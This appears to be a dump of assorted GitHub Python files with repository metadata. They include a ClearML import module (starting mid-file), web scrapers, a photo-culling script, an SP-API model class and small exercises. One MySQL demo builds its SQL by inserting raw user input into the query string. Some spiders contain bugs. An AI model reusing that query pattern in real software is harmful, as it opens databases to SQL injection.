orig_id:\n ids[orig_id] = (\n id_func(orig_id)\n if id_func != cls._hash_id\n else id_func(doc.get(\"name\"))\n )\n return ids\n\n @classmethod\n def _import(\n cls,\n reader: ZipFile,\n company_id: str = \"\",\n user_id: str = None,\n metadata: Mapping[str, Any] = None,\n sort_tasks_by_last_updated: bool = True,\n ):\n \"\"\"\n Import entities and events from the zip file\n Start from entities since event import will require the tasks already in DB\n \"\"\"\n event_file_ending = cls.events_file_suffix + \".json\"\n entity_files = [\n fi\n for fi in reader.filelist\n if not fi.orig_filename.endswith(event_file_ending)\n and fi.orig_filename != cls.metadata_filename\n ]\n metadata = metadata or {}\n old_to_new_ids = cls._generate_new_ids(reader, entity_files, metadata)\n tasks = []\n for entity_file in entity_files:\n with reader.open(entity_file) as f:\n full_name = splitext(entity_file.orig_filename)[0]\n print(f\"Reading {reader.filename}:{full_name}...\")\n res = cls._import_entity(\n f, full_name, company_id, user_id, metadata, old_to_new_ids\n )\n if res:\n tasks = res\n\n if sort_tasks_by_last_updated:\n tasks = sorted(tasks, key=attrgetter(\"last_update\"))\n\n new_to_old_ids = {v: k for k, v in old_to_new_ids.items()}\n for task in tasks:\n old_task_id = new_to_old_ids.get(task.id, task.id)\n events_file = first(\n fi\n for fi in reader.filelist\n if fi.orig_filename.endswith(old_task_id + event_file_ending)\n )\n if not events_file:\n continue\n with reader.open(events_file) as f:\n full_name = splitext(events_file.orig_filename)[0]\n print(f\"Reading {reader.filename}:{full_name}...\")\n cls._import_events(f, company_id, user_id, task.id)\n\n @classmethod\n def _get_entity_type(cls, full_name) -> Type[mongoengine.Document]:\n module_name, _, class_name = full_name.rpartition(\".\")\n if cls.module_name_prefix and not module_name.startswith(\n cls.module_name_prefix\n ):\n module_name = cls.module_name_prefix + module_name\n module = importlib.import_module(module_name)\n return getattr(module, class_name)\n\n @staticmethod\n def _upgrade_project_data(project_data: dict) -> dict:\n if not project_data.get(\"basename\"):\n name: str = project_data[\"name\"]\n _, _, basename = name.rpartition(\"/\")\n project_data[\"basename\"] = basename\n\n return project_data\n\n @staticmethod\n def _upgrade_model_data(model_data: dict) -> dict:\n metadata_key = \"metadata\"\n metadata = model_data.get(metadata_key)\n if isinstance(metadata, list):\n metadata = {\n ParameterKeyEscaper.escape(item[\"key\"]): item\n for item in metadata\n if isinstance(item, dict) and \"key\" in item\n }\n model_data[metadata_key] = metadata\n return model_data\n\n @staticmethod\n def _upgrade_task_data(task_data: dict) -> dict:\n \"\"\"\n Migrate from execution/parameters and model_desc to hyperparams and configuration fiields\n Upgrade artifacts list to dict\n Migrate from execution.model and output.model to the new models field\n Move docker_cmd contents into the container field\n :param task_data: Upgraded in place\n :return: The upgraded task data\n \"\"\"\n for old_param_field, new_param_field, default_section in (\n (\"execution.parameters\", \"hyperparams\", hyperparams_default_section),\n (\"execution.model_desc\", \"configuration\", None),\n ):\n legacy_path = old_param_field.split(\".\")\n legacy = nested_get(task_data, legacy_path)\n if legacy:\n for full_name, value in legacy.items():\n section, name = split_param_name(full_name, default_section)\n new_path = list(filter(None, (new_param_field, section, name)))\n if not nested_get(task_data, new_path):\n new_param = dict(\n name=name, type=hyperparams_legacy_type, value=str(value)\n )\n if section is not None:\n new_param[\"section\"] = section\n nested_set(task_data, path=new_path, value=new_param)\n nested_delete(task_data, legacy_path)\n\n artifacts_path = (\"execution\", \"artifacts\")\n artifacts = nested_get(task_data, artifacts_path)\n if isinstance(artifacts, list):\n nested_set(\n task_data,\n path=artifacts_path,\n value={get_artifact_id(a): a for a in artifacts},\n )\n\n models = task_data.get(\"models\", {})\n now = datetime.utcnow()\n for old_field, type_ in (\n (\"execution.model\", TaskModelTypes.input),\n (\"output.model\", TaskModelTypes.output),\n ):\n old_path = old_field.split(\".\")\n old_model = nested_get(task_data, old_path)\n new_models = models.get(type_, [])\n name = TaskModelNames[type_]\n if old_model and not any(\n m\n for m in new_models\n if m.get(\"model\") == old_model or m.get(\"name\") == name\n ):\n model_item = {\"model\": old_model, \"name\": name, \"updated\": now}\n if type_ == TaskModelTypes.input:\n new_models = [model_item, *new_models]\n else:\n new_models = [*new_models, model_item]\n models[type_] = new_models\n nested_delete(task_data, old_path)\n task_data[\"models\"] = models\n\n docker_cmd_path = (\"execution\", \"docker_cmd\")\n docker_cmd = nested_get(task_data, docker_cmd_path)\n if docker_cmd and not task_data.get(\"container\"):\n image, _, arguments = docker_cmd.partition(\" \")\n task_data[\"container\"] = {\"image\": image, \"arguments\": arguments}\n nested_delete(task_data, docker_cmd_path)\n\n return task_data\n\n @classmethod\n def _import_entity(\n cls,\n f: IO[bytes],\n full_name: str,\n company_id: str,\n user_id: str,\n metadata: Mapping[str, Any],\n old_to_new_ids: Mapping[str, str] = None,\n ) -> Optional[Sequence[Task]]:\n cls_ = cls._get_entity_type(full_name)\n print(f\"Writing {cls_.__name__.lower()}s into database\")\n tasks = []\n override_project_count = 0\n data_upgrade_funcs: Mapping[Type, Callable] = {\n cls.task_cls: cls._upgrade_task_data,\n cls.model_cls: cls._upgrade_model_data,\n cls.project_cls: cls._upgrade_project_data,\n }\n for item in cls.json_lines(f):\n if old_to_new_ids:\n for old_id, new_id in old_to_new_ids.items():\n # replace ids only when they are standalone strings\n # otherwise artifacts uris that contain old ids may get damaged\n item = item.replace(f'\"{old_id}\"', f'\"{new_id}\"')\n upgrade_func = data_upgrade_funcs.get(cls_)\n if upgrade_func:\n item = json.dumps(upgrade_func(json.loads(item)))\n\n doc = cls_.from_json(item, created=True)\n if hasattr(doc, \"user\"):\n doc.user = user_id\n if hasattr(doc, \"company\"):\n doc.company = company_id\n if isinstance(doc, cls.project_cls):\n override_project_name = metadata.get(\"project_name\", None)\n if override_project_name:\n if override_project_count:\n override_project_name = (\n f\"{override_project_name} {override_project_count + 1}\"\n )\n override_project_count += 1\n doc.name = override_project_name\n\n doc.logo_url = metadata.get(\"logo_url\", None)\n doc.logo_blob = metadata.get(\"logo_blob\", None)\n\n cls_.objects(company=company_id, name=doc.name, id__ne=doc.id).update(\n set__name=f\"{doc.name}_{datetime.utcnow().strftime('%Y-%m-%d_%H-%M-%S')}\"\n )\n\n doc.save()\n\n if isinstance(doc, cls.task_cls):\n tasks.append(doc)\n cls.event_bll.delete_task_events(company_id, doc.id, allow_locked=True)\n\n if tasks:\n return tasks\n\n @classmethod\n def _import_events(cls, f: IO[bytes], company_id: str, _, task_id: str):\n print(f\"Writing events for task {task_id} into database\")\n for events_chunk in chunked_iter(cls.json_lines(f), 1000):\n events = [json.loads(item) for item in events_chunk]\n for ev in events:\n ev[\"task\"] = task_id\n ev[\"company_id\"] = company_id\n ev[\"allow_locked\"] = True\n cls.event_bll.add_events(\n company_id, events=events, worker=\"\"\n )\n","repo_name":"allegroai/clearml-server","sub_path":"apiserver/mongo/initialize/pre_populate.py","file_name":"pre_populate.py","file_ext":"py","file_size_in_byte":35794,"program_lang":"python","lang":"en","doc_type":"code","stars":334,"dataset":"github-code","pt":"21"} +{"seq_id":"35843131441","text":"import sys\ninput = lambda: sys.stdin.readline().rstrip()\n\ndef _chicken(i, gap):\n\tif i > t:\n\t\treturn 0\n\tif dp[i - gap] + 1 > dp[i]:\n\t\tdp[i] = dp[i - gap] + 1\n\t_chicken(i+a, a)\n\t_chicken(i+b, b)\n\ndef chicken(i, a, b):\n\t_chicken(i+a, a)\n\t_chicken(i+b, b)\n\tif dp[t] != 0:\n\t\tprint(dp[t])\n\telse:\n\t\tcnt = 1\n\t\tfor i in range(t-1, 0, -1):\n\t\t\tif dp[i] != 0:\n\t\t\t\tprint(dp[i], cnt)\n\t\t\t\tbreak\n\t\t\tcnt += 1\n\nif __name__ == '__main__':\n\ta, b, t = map(int, input().split())\n\tdp = [0] * (t+1)\n\tchicken(0, a, b)\n\n'''\nO(t^2)\n'''","repo_name":"zinnnn37/4-1_Competitive_Programming_and_Practice","sub_path":"week10/chicken_rec.py","file_name":"chicken_rec.py","file_ext":"py","file_size_in_byte":508,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"17491663610","text":"import scrapy\nfrom scrapy.http.request import Request\nfrom datetime import datetime\n\nclass IbrevSpider(scrapy.Spider):\n name = 'ibrev'\n allowed_domains = ['ibreviary.com']\n start_urls = ['http://www.ibreviary.com/m2/breviario.php']\n date_object = datetime.strptime(\"03/14/2022\", \"%m/%d/%Y\")\n \n def parse(self,response):\n #lang=en&giorno=14&mese=3&anno=2022&ok=ok\n \n my_data = self.date_object.strftime('lang=en&giorno=%d&mese=%m&anno=%Y&ok=ok')\n yield Request(self.start_urls[0],\n method='POST', \n body=my_data, \n headers={'Content-Type': 'application/x-www-form-urlencoded'},\n callback=self.parse_day)\n \n def parse_hour(self, hour):\n \"\"\"\n parse_day gets basic info of day.\n\n :param hour: 0=OoR, 1=MP, 2=DP, 3=EP, 4=NP\n :return: describe what it returns\n \"\"\"\n print(\"FF\")\n hours_url_string = [\"s=ufficio_delle_letture\",\"s=lodi\",\"s=ora_media\",\"s=vespri\",\"s=compieta\"]\n hour_functions = [\"parse_office\",\"parse_lauds\",\"parse_midday\",\"parse_vespers\",\"parse_compline\"]\n self.date_object.strftime('lang=en&giorno=%d&mese=%m&anno=%Y&ok=ok')\n yield Request(self.start_urls[0]+hours_url_string[hour],\n method='POST', \n body=my_data, \n headers={'Content-Type': 'application/x-www-form-urlencoded'},\n callback=eval(\"self.\"+hour_functions[hour])\n )\n\n def parse_office(self, response):\n print(\"PO\")\n ant_one_sel = \"//*[@id='contenuto']/div/p[5]/text()[1]\"\n ant_two_sel = \"//*[@id='contenuto']/div/p[5]/text()[49]\"\n ant_three_sel = \"//*[@id='contenuto']/div/p[5]/text()[73]\"\n \n rand = \"//*[@id='contenuto']/div/p[2]/span[1]\"\n print(response.xpath(rand).get())\n print(response.xpath(ant_one_sel).get())\n print(response.xpath(ant_two_sel).get())\n print(response.xpath(ant_three_sel).get())\n \n def parse_day(self, response):\n \"\"\"\n parse_day gets basic info of day.\n\n :return: describe what it returns\n \"\"\"\n # Tuesday, 15 March 2022\n day_title_sel = \"//*[@id='contenuto']/div/p[1]/text()\"\n \n # Tuesday of the Second Week of Lent\n day_liturgical_title_sel = \"//*[@id='contenuto']/div/p[2]/text()\"\n \n # Tipo: Feriale - Tempo: Quaresima\n season_sel = \"//*[@id='contenuto']/div/p[3]/text()\"\n\n # [\"Tipo: Feriale\",\"Tempo: Quaresima\"]\n day_type_season_delimiator = \" - \"\n \n # [\"Tipo\",\"Feriale\"]\n type_text_delimiator = \": \"\n \n day_types_it = [\"Feriale\",\"Festivo\"]\n day_types_en = [\"Of the Day\",\"Feast\"]\n \n season_it = [\"Ordinario\",\"Quaresima\",\"Natale\",\"Avvento\",\"Pasqua\"]\n season_en = [\"Ordinary Time\", \"Lent\", \"Christmas\", \"Advent\", \"Easter\"]\n \n day_title = response.xpath(day_title_sel).get()\n \n day_liturgical_title = response.xpath(day_liturgical_title_sel).get()\n \n unsplit_season = response.xpath(season_sel).get()\n \n season = unsplit_season.split(day_type_season_delimiator)[1]\n season = season.split(type_text_delimiator)[1]\n \n day_type = unsplit_season.split(day_type_season_delimiator)[0]\n day_type = day_type.split(type_text_delimiator)[1]\n \n \n print(day_title)\n print(day_liturgical_title)\n print(season + \" [\"+season_en[season_it.index(season)]+\"]\")\n print(day_type + \" [\"+day_types_en[day_types_it.index(day_type)]+\"]\")\n \n self.parse_hour(0)\n \n yield {\"Day Title\": day_title}\n \n ","repo_name":"ailgup/briefer_breviary","sub_path":"breviary/breviary/spiders/ibrev.py","file_name":"ibrev.py","file_ext":"py","file_size_in_byte":3809,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"44025029891","text":"\"\"\"\nMessage representations received from the panel through the `AlarmDecoder`_ (AD2)\ndevices.\n\n:py:class:`AUIMessage`: Message received destined for an AUI keypad.\n\n.. _AlarmDecoder: http://www.alarmdecoder.com\n\n.. moduleauthor:: Scott Petersen \n\"\"\"\n\nfrom . import BaseMessage\nfrom ..util import InvalidMessageError\n\nclass AUIMessage(BaseMessage):\n \"\"\"\n Represents a message destined for an AUI keypad.\n \"\"\"\n\n value = None\n \"\"\"Raw value of the AUI message\"\"\"\n\n def __init__(self, data=None):\n \"\"\"\n Constructor\n\n :param data: message data to parse\n :type data: string\n \"\"\"\n BaseMessage.__init__(self, data)\n\n if data is not None:\n self._parse_message(data)\n\n def _parse_message(self, data):\n header, value = data.split(':')\n\n self.value = value\n\n def dict(self, **kwargs):\n \"\"\"\n Dictionary representation.\n \"\"\"\n return dict(\n value = self.value,\n **kwargs\n )","repo_name":"nutechsoftware/alarmdecoder","sub_path":"alarmdecoder/messages/aui_message.py","file_name":"aui_message.py","file_ext":"py","file_size_in_byte":1031,"program_lang":"python","lang":"en","doc_type":"code","stars":58,"dataset":"github-code","pt":"21"} +{"seq_id":"1078962172","text":"from PIL import Image, ExifTags\nfrom pathlib import Path\nimport itertools\nimport datetime\nimport torch\nimport torchvision.models as models\nimport torchvision.transforms as transforms\nfrom torch.nn import functional as F\nimport copy\nfrom model.model import NIMA\nfrom collections.abc import Iterable\nimport argparse\nimport pandas as pd\n\n\nclass TypedNamespace(argparse.Namespace):\n image_path: str\n model_path: str\n predictions: str\n score_only: bool\n similarity_threshold: float\n time_threshold: int\n\n\ndef get_parser():\n parser = argparse.ArgumentParser()\n parser.add_argument('--image_path', type=str, required=True, help='path to file or folder containing images')\n parser.add_argument('--model_path', type=str, default=\"model_weights/filtered_v2_epoch-40.pth\",\n help='path to pretrained model')\n parser.add_argument('--prediction_path', type=str, default=\"predictions\",\n help='output directory to store predictions')\n parser.add_argument('--score_only', action='store_true',\n help='Whether to skip the culling step, and instead only score the images')\n parser.add_argument('--similarity_threshold', type=float, default=0.3,\n help='Threshold for how similar two items need to be in order to group them ')\n parser.add_argument(\"--time_threshold\", type=int, default=10,\n help='In order to group two photos, the number of minutes between them must be less than this '\n 'number')\n return parser\n\n\ndef score_paths(model: NIMA, image_paths: Iterable[Path]) -> dict[Path, float]:\n \"\"\"\n Takes a collection of paths, and computes the predicted aesthetic score for each one, returning the predicted best\n image along with predicted scores for all images\n\n Args:\n model: A model which computes quality scores for images\n image_paths: A collection of paths to images\n\n Returns: The path to the best image, and a dictionary mapping image paths to associated scores\n\n \"\"\"\n\n device = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\n\n test_transform = transforms.Compose([\n transforms.Resize((224, 224)),\n transforms.ToTensor(),\n transforms.Normalize(mean=[0.485, 0.456, 0.406],\n std=[0.229, 0.224, 0.225])\n ])\n scores = []\n for i, img in enumerate(image_paths):\n mean, std = 0.0, 0.0\n im = Image.open(img)\n im = im.convert('RGB')\n imt = test_transform(im)\n imt = imt.unsqueeze(dim=0)\n imt = imt.to(device)\n with torch.no_grad(), torch.autocast(device_type=\"cuda\" if torch.cuda.is_available() else \"cpu\"):\n out = model(imt)\n out = out.view(10, 1)\n for j, e in enumerate(out, 1):\n mean += j * e\n for k, e in enumerate(out, 1):\n std += e * (k - mean) ** 2\n std = std ** 0.5\n\n mean, std = float(mean), float(std)\n scores.append((img, mean))\n\n return dict(scores)\n\n\ndef extract_features(image_paths: Iterable[Path]) -> list[tuple[Path, datetime.datetime, torch.tensor]]:\n \"\"\"\n Takes paths, and extracts the time it was taken via metadata and also computes the features using the base model\n\n Args:\n image_paths: the paths to the desired images to look at\n\n Returns: A list of triples of the (original) paths, datetime taken, and base model features\n\n \"\"\"\n feature_model = models.vgg16(weights='VGG16_Weights.IMAGENET1K_V1')\n\n seed = 42\n torch.manual_seed(seed)\n\n device = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\n\n model = feature_model.to(device)\n\n model.eval()\n\n test_transform = transforms.Compose([\n transforms.Resize((224, 224)),\n transforms.ToTensor(),\n transforms.Normalize(mean=[0.485, 0.456, 0.406],\n std=[0.229, 0.224, 0.225])\n ])\n\n # Grab metadata and compute VGG features\n data = []\n for image_path in image_paths:\n img = Image.open(image_path)\n exif = {ExifTags.TAGS[k]: v for k, v in img.getexif().items() if k in ExifTags.TAGS}\n picture_time = datetime.datetime.strptime(exif[\"DateTime\"],\n \"%Y:%m:%d %H:%M:%S\") if \"DateTime\" in exif else datetime.datetime(1,\n 1,\n 1)\n im = Image.open(image_path)\n im = im.convert('RGB')\n imt = test_transform(im)\n imt = imt.unsqueeze(dim=0)\n imt = imt.to(device)\n features = model.features(imt)\n\n data.append((image_path, picture_time, features))\n return data\n\n\ndef group_by_features(data: Iterable[tuple[Path, datetime.datetime, torch.tensor]], time_threshold, similarity_threshold) -> set[frozenset[Path]]:\n \"\"\"\n Determine pairs of items that are similar in time and VGG features\n\n Args:\n data: triples of path, datetime, and (base) model features\n\n Returns: Set of groups of images that are similar in time and features\n\n \"\"\"\n similar_images = []\n all_connected_images = set()\n for (image_path1, datetime1, features1), (image_path2, datetime2, features2) in itertools.combinations(data, 2):\n if abs(datetime1 - datetime2) <= datetime.timedelta(minutes=time_threshold) and F.cosine_similarity(\n features1.view(1, -1), features2.view(1, -1)).cpu().data >= similarity_threshold:\n similar_images.append([image_path1, image_path2])\n all_connected_images |= {image_path1, image_path2}\n\n # Turning pairs of similar items into full groups. Too tired to figure out the right way of doing this\n graph = {img: {img_pair[0] if img_pair[1] == img else img_pair[1] for img_pair in similar_images if img in img_pair}\n for img in all_connected_images}\n old_graph = {}\n while graph != old_graph:\n old_graph = copy.deepcopy(graph)\n graph = {img: set.union(*[graph[img2] for img2 in connected_imgs]) for img, connected_imgs in graph.items()}\n\n #\n groups = {frozenset(connected_imgs) for connected_imgs in graph.values()}\n return groups\n\n\ndef get_evaluation_model(weight_path: Path | str) -> NIMA:\n \"\"\"\n Sets up the model used to evaluate photo quality\n\n :param weight_path: path to the filed containing the weights for the pretrained model\n :return: the NIMA model with loaded weights\n \"\"\"\n base_model = models.vgg16(weights='VGG16_Weights.IMAGENET1K_V1')\n model = NIMA(base_model)\n\n try:\n model.load_state_dict(torch.load(weight_path))\n print('successfully loaded evaluation model')\n except:\n raise RuntimeError(\"Could not load state dictionary, are you sure your path is correct?\")\n\n seed = 42\n torch.manual_seed(seed)\n\n device = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\n\n model = model.to(device)\n\n model.eval()\n\n return model\n\n\ndef extract_top_scored(group: Iterable[Path], scores: dict[Path, float]) -> Path:\n return max(group, key=lambda path: scores[path])\n\n\ndef main():\n parser = get_parser()\n args = parser.parse_args(namespace=TypedNamespace())\n print(args)\n\n image_dir = Path(args.image_path)\n image_paths = list(itertools.chain(image_dir.glob(\"*.jpg\"),\n image_dir.glob(\"*.jpeg\"),\n image_dir.glob(\"*.png\")))\n\n model = get_evaluation_model(weight_path=args.model_path)\n scores = score_paths(model, image_paths)\n prediction_path = Path(args.prediction_path)\n\n if not prediction_path.exists():\n prediction_path.mkdir(parents=True)\n pd.DataFrame(scores.items(), columns=[\"path\", \"score\"]).to_csv(prediction_path / \"scores.csv\", index=False)\n print(f\"Image scores saved to {prediction_path / 'scores.csv'}\")\n\n if not args.score_only:\n path_date_features = extract_features(image_paths)\n print(\"Image features extracted, now grouping images\")\n groups = group_by_features(path_date_features,\n time_threshold=args.time_threshold, similarity_threshold=args.similarity_threshold)\n print(\"Images successfully grouped\")\n culled_unflattened = [group - {extract_top_scored(group, scores)} for group in groups]\n culled_images = frozenset.union(*culled_unflattened)\n # We've restricted to groups of images, so we need to put back in the ungrouped images\n kept_images = set(image_paths) - culled_images\n\n with open(prediction_path / \"kept_images.txt\", \"w\") as f:\n f.write(\"\\n\".join([kept_image.name for kept_image in kept_images]))\n print(f\"Kept image list saved to {prediction_path / 'kept_images.txt'}\")\n\n with open(prediction_path / \"culled_images.txt\", \"w\") as f:\n f.write(\"\\n\".join([culled_image.name for culled_image in culled_images]))\n print(f\"Culled image list saved to {prediction_path / 'culled_images.txt'}\")\n\n\n return 0\n\n\nif __name__ == '__main__':\n raise SystemExit(main())\n","repo_name":"adelynflowers/photoCulling","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":9267,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"21"} +{"seq_id":"33898508753","text":"from typing import TYPE_CHECKING, Any, Dict, List, Type, TypeVar, Union\n\nimport attr\n\nfrom ..models.label_format import LabelFormat\nfrom ..models.standard_id_for_label import StandardIdForLabel\nfrom ..types import UNSET, Unset\n\nif TYPE_CHECKING:\n from ..models.file_contents import FileContents\n from ..models.label_dimensions import LabelDimensions\n\n\nT = TypeVar(\"T\", bound=\"Label\")\n\n\n@attr.s(auto_attribs=True)\nclass Label:\n r\"\"\"Data for creating a shipping label and dimensions for printing the label.\n\n Attributes:\n dimensions (LabelDimensions): Dimensions for printing a shipping label.\n file_contents (FileContents): The document data and checksum.\n custom_text_for_label (Union[Unset, str]): Custom text to print on the label.\n\n Note: Custom text is only included on labels that are in ZPL format (ZPL203). FedEx does not support\n CustomTextForLabel.\n label_format (Union[Unset, LabelFormat]): The label format.\n standard_id_for_label (Union[Unset, StandardIdForLabel]): The type of standard identifier to print on the label.\n \"\"\"\n\n dimensions: \"LabelDimensions\"\n file_contents: \"FileContents\"\n custom_text_for_label: Union[Unset, str] = UNSET\n label_format: Union[Unset, LabelFormat] = UNSET\n standard_id_for_label: Union[Unset, StandardIdForLabel] = UNSET\n additional_properties: Dict[str, Any] = attr.ib(init=False, factory=dict)\n\n def to_dict(self) -> Dict[str, Any]:\n dimensions = self.dimensions.to_dict()\n\n file_contents = self.file_contents.to_dict()\n\n custom_text_for_label = self.custom_text_for_label\n label_format: Union[Unset, str] = UNSET\n if not isinstance(self.label_format, Unset):\n label_format = self.label_format.value\n\n standard_id_for_label: Union[Unset, str] = UNSET\n if not isinstance(self.standard_id_for_label, Unset):\n standard_id_for_label = self.standard_id_for_label.value\n\n field_dict: Dict[str, Any] = {}\n field_dict.update(self.additional_properties)\n field_dict.update(\n {\n \"Dimensions\": dimensions,\n \"FileContents\": file_contents,\n }\n )\n if custom_text_for_label is not UNSET:\n field_dict[\"CustomTextForLabel\"] = custom_text_for_label\n if label_format is not UNSET:\n field_dict[\"LabelFormat\"] = label_format\n if standard_id_for_label is not UNSET:\n field_dict[\"StandardIdForLabel\"] = standard_id_for_label\n\n return field_dict\n\n @classmethod\n def from_dict(cls: Type[T], src_dict: Dict[str, Any]) -> T:\n from ..models.file_contents import FileContents\n from ..models.label_dimensions import LabelDimensions\n\n d = src_dict.copy()\n dimensions = LabelDimensions.from_dict(d.pop(\"Dimensions\"))\n\n file_contents = FileContents.from_dict(d.pop(\"FileContents\"))\n\n custom_text_for_label = d.pop(\"CustomTextForLabel\", UNSET)\n\n _label_format = d.pop(\"LabelFormat\", UNSET)\n label_format: Union[Unset, LabelFormat]\n if isinstance(_label_format, Unset):\n label_format = UNSET\n else:\n label_format = LabelFormat(_label_format)\n\n _standard_id_for_label = d.pop(\"StandardIdForLabel\", UNSET)\n standard_id_for_label: Union[Unset, StandardIdForLabel]\n if isinstance(_standard_id_for_label, Unset):\n standard_id_for_label = UNSET\n else:\n standard_id_for_label = StandardIdForLabel(_standard_id_for_label)\n\n result = cls(\n dimensions=dimensions,\n file_contents=file_contents,\n custom_text_for_label=custom_text_for_label,\n label_format=label_format,\n standard_id_for_label=standard_id_for_label,\n )\n\n result.additional_properties = d\n return result\n\n @property\n def additional_keys(self) -> List[str]:\n return list(self.additional_properties.keys())\n\n def __getitem__(self, key: str) -> Any:\n return self.additional_properties[key]\n\n def __setitem__(self, key: str, value: Any) -> None:\n self.additional_properties[key] = value\n\n def __delitem__(self, key: str) -> None:\n del self.additional_properties[key]\n\n def __contains__(self, key: str) -> bool:\n return key in self.additional_properties\n","repo_name":"milyord/sp-api","sub_path":"sp/merchant_fulfillment_v0/models/label.py","file_name":"label.py","file_ext":"py","file_size_in_byte":4402,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"72324624693","text":"\nimport mysql.connector\n\nmy_db = mysql.connector.connect(\n host=\"localhost\",\n user=\"root\",\n password=\"#####\",\n database=\"testdb\"\n)\n\nmy_cursor = my_db.cursor()\n\ndef insert_concert_from_user_input():\n datum = input('Datum: ')\n land = input('Land: ')\n stadt = input('Stadt: ')\n\n val = f'\"{datum}\", \"{land}\", \"{stadt}\"'\n sql = f'INSERT INTO konzerte VALUE ({val})'\n\n my_cursor.execute(sql)\n my_db.commit()\n\ndef show_all_data():\n my_cursor.execute(\"SELECT * FROM konzerte\")\n result = my_cursor.fetchall()\n\n for _ in result:\n print(_)\n\n\ninsert_concert_from_user_input()\n\nshow_all_data()\n","repo_name":"HaudegenHH/Python-Projects","sub_path":"mysql_example.py","file_name":"mysql_example.py","file_ext":"py","file_size_in_byte":631,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"6290853225","text":"#Krishna Narayan\n#2327205\n#narayan@chapman.edu\n#CPSC 230 section 08\n#Assignment 1\n\n#calculating total hours, minutes and seconds based on total amount of seconds\ndef seconds():\n #takes input\n total_seconds = int(input(\"input total amount of seconds \"))\n #divides out hours\n exact_hours = total_seconds / 3600\n #defines remaining seconds\n remaining_seconds = total_seconds % 3600\n #divides out minutes\n exact_minutes = remaining_seconds / 60\n #takes remainder as final remaining seconds\n exact_seconds_final = (remaining_seconds % 60)\n #prints with rounding for readability.\n return str(int(exact_hours)) + \" hours, \" + str(int(exact_minutes)) + \" minutes, \" + str(int(exact_seconds_final)) + \" seconds \"\n\nprint(seconds())\n","repo_name":"narayan-krishna/fall2019cpsc230","sub_path":"Assignment1/Seconds.py","file_name":"Seconds.py","file_ext":"py","file_size_in_byte":758,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"39950841972","text":"import sys\nimport numpy as np\n\nin_file = sys.argv[1] if len(sys.argv) > 1 else \"input\"\ndata = open(in_file, 'r').read().splitlines()\n \nnb = [[x for x in l] for l in data]\nnb = np.array(nb)\n\ns = 0\nfor c in range(len(nb)):\n for r in range(len(nb[c])):\n v = False\n v |= all(nb[c, r] > nb[:c, r])\n v |= all(nb[c, r] > nb[c+1:, r])\n v |= all(nb[c, r] > nb[c, :r])\n v |= all(nb[c, r] > nb[c, r+1:])\n s += int(v)\nprint(s)\n\nm = 0\nfor c in range(1, len(nb)):\n for r in range(1, len(nb[c])):\n d = 1\n d *= c - next((c2 for c2 in range(c-1, -1, -1) if nb[c2, r] >= nb[c, r]), 0)\n d *= next((c2 for c2 in range(c+1, len(nb)) if nb[c2, r] >= nb[c, r]), len(nb)-1) - c\n d *= r - next((r2 for r2 in range(r-1, -1, -1) if nb[c, r2] >= nb[c, r]), 0)\n d *= next((r2 for r2 in range(r+1, len(nb[c])) if nb[c, r2] >= nb[c, r]), len(nb[c])-1) - r\n m = max(m, d)\nprint(m)","repo_name":"theevann/advent-of-code","sub_path":"2022/day_8/sol2.py","file_name":"sol2.py","file_ext":"py","file_size_in_byte":941,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"72895508852","text":"import scrapy\nimport time\nimport sys\nfrom __future__ import print_function\nfrom bs4 import BeautifulSoup\nfrom scrapy.selector import Selector\nfrom scrapy.http.request import Request\nfrom okezone.items import OkezoneItem\n\n\nclass OkezoneSpider(scrapy.Spider):\n name = \"okezone\"\n allowed_domains = [\"okezone.com\"]\n start_urls = [\n \"http://index.okezone.com/\",\n ]\n\n def parse(self, response):\n \"\"\" This function parses a property page.\n\n @url http://index.okezone.com/\n @returns items\n \"\"\"\n\n indeks = Selector(response).xpath('//*[@id=\"in\"]/ol/li')\n\n for indek in indeks:\n item = OkezoneItem()\n news_link = indek.xpath('h4/a/@href').extract_first().strip()\n item['title'] = indek.xpath('h4/a/text()').extract_first().strip()\n item['link'] = news_link\n item['category'] = indek.xpath('h6/a/text()').extract_first().strip()\n item['date'] = time.strftime(\"%d/%m/%Y\")\n detail_request = Request(news_link, callback=self.parse_detail)\n detail_request.meta['item'] = item\n yield detail_request\n\n def parse_detail(self, response):\n print(\"Crawling detail news\")\n item = response.meta['item']\n selector = Selector(response)\n description = selector.xpath('//*[@id=\"contentx\"]').extract_first()\n item['desc'] = BeautifulSoup(description).text.strip()\n item['images'] = selector.xpath('//*[@id=\"imgCheck\"]/@src')\n return item","repo_name":"harryandriyan/warta-scrap","sub_path":"okezone/okezone/spiders/okezone_spider.py","file_name":"okezone_spider.py","file_ext":"py","file_size_in_byte":1524,"program_lang":"python","lang":"en","doc_type":"code","stars":73,"dataset":"github-code","pt":"21"} +{"seq_id":"6701742566","text":"import numpy as np\nimport os\nimport sys\nimport pandas as pd\nimport pickle\nfrom pathlib import Path\nfrom PST import runPST\nimport argparse\nsys.path.insert(0, 'src/')\nfrom filepath_dir import Chain_dir, Uniprot_to_PDB, dataset_to_uniprot\ndef get_upper(characters):\n characters_new=''\n for a in characters:\n if a.isalpha():\n a=a.upper()\n characters_new+=a\n return characters_new\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument('dataset',type=str)\n parser.add_argument('a',type=int,help=\"index for the first mutation to be calculated\")\n parser.add_argument('b',type=int,help=\"index for the last mutation to be calculated\",)\n parser.add_argument(\"--max_mut\",type=int,help=\"max number of mutations\",default=1)\n parser.add_argument(\"--site_method\",type=str,help=\"Method for dealing with features involving multiple mutations. \"\n \"`align` concatenate features to a vector, and use zero padding to fill position if number of mutations is fewer than --max_mut.\"\n \"`sum` sum up features over all mutational sites\"\n \"Options: 1. align 2. sum 3. avg \",default='sum')\n 